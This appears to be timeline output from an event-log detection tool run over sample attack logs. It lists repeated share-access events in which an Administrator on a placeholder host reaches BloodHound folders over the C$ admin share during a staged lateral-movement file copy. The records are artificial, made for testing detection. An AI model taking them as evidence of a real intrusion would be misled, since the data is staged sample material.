Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 